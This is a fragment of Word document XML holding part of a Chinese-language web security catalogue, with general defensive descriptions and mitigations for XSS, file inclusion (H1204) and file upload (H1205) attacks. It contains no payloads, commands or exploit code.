      <w:tr w:rsidR="006003E3" w:rsidRPr="00671A0D" w14:paraId="2B36D693" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243082E4" w14:textId="30F30B8B" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入内容长度限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741A2CD5" w14:textId="242DA634" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7BCC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以为不可信输入设置合理的限制，这增加了启动</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击的复杂性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7BCC" w:rsidRPr="00671A0D" w14:paraId="781BBFE1" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FDF630" w14:textId="5D6D4813" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用仅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DA8B38" w14:textId="330D9331" w:rsidR="00FA7BCC" w:rsidRDefault="00880EAA" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>J</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>avScript</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止读取一些敏感的</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Cookie</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息，因此即使在</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入后黑客也无法窃取</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Cookie</w:t>
            </w:r>
            <w:r w:rsidR="00FA7BCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7BCC" w:rsidRPr="00671A0D" w14:paraId="5DCFAC87" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55E3C6D1" w14:textId="054A1E37" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E4F2874" w14:textId="66F35433" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证码用于防止脚本冒充用户执行危险操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71D28E28" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3"/>
    <w:p w14:paraId="0C75DB34" w14:textId="719E07A2" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C4867" w14:paraId="0381EA49" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2067140A" w14:textId="20C37891" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CF7651" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D787550" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013941F4" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA3D07C" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A05AB34" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5D77B5" w14:textId="2C6E3285" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含是针对动态引用外部脚本的</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序中的漏洞的攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>犯罪者的目标是利用应用程序中的引用功能来包含本地文件或从位于不同域中的远程</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上载恶意软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085FADD" w14:textId="1A94D8AF" w:rsidR="001C4867" w:rsidRPr="006003E3" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE0FE6" w14:textId="2612D5EB" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止文件包含攻击的三种主要方法是：</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057F9A4" w14:textId="77150BAB" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永远不要在文字文件包括请求中使用任意输入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E927C30" w14:textId="00A0F9EC" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用过滤器彻底清除输入参数以防止可能的文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A989699" w14:textId="3AA0924D" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建动态白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D23517" w14:textId="14E0D6E4" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867">
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与所有代码注入攻击一样，文件包含是允许不安全数据进入安全上下文的结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C4867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止文件包含攻击的最佳方法是永远不要在文字文件包含请求中使用任意输入数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B7957" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="001C4867"/>
    <w:p w14:paraId="78F26CF0" w14:textId="256A3EA5" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="009917C2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="009917C2" w14:paraId="10B24C9D" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074A369E" w14:textId="1A2DA95D" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69FAC070" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451DEF97" w14:textId="77777777" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287D436E" w14:textId="77777777" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6890A90D" w14:textId="77777777" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2331E44D" w14:textId="77777777" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="009917C2">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219AF1F3" w14:textId="5EBABF10" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="009917C2">
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传的文件对应用程序构成重大风险。</w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多攻击的第一步是将一些代码提供给系统进行攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后攻击只需要找到一种方法来执行代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用文件上传有助于攻击者完成第一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F6978" w14:textId="3D40C1BF" w:rsidR="009917C2" w:rsidRDefault="009917C2" w:rsidP="009917C2">
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不受限制的文件上传的后果可能会有所不同，包括完整的系统接管，文件系统或数据库过载，向后端系统转发攻击，客户端攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009917C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这取决于应用程序对上传文件的作用，尤其是存储的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78559CAB" w14:textId="2505F358" w:rsidR="009917C2" w:rsidRPr="009917C2" w:rsidRDefault="009917C2" w:rsidP="00880EAA">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="009917C2" w:rsidRPr="005C4554" w14:paraId="4DFD7D01" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2591D712" w14:textId="77777777" w:rsidR="009917C2" w:rsidRPr="005C4554" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="66F48775" w14:textId="77777777" w:rsidR="009917C2" w:rsidRPr="005C4554" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009917C2" w:rsidRPr="00671A0D" w14:paraId="4A6298B2" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B15F9D" w14:textId="764947E7" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FADD21D" w14:textId="745872DC" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="009917C2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用特定扩展限制上载的文件以帮助防止执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webshell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009917C2" w:rsidRPr="00671A0D" w14:paraId="0B598004" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4388CFBD" w14:textId="70AD7ED0" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72964ECA" w14:textId="4AE6E840" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="009917C2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用白名单方法检查文件扩展名的应用程序还需要验证完整文件名以防止任何绕过。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
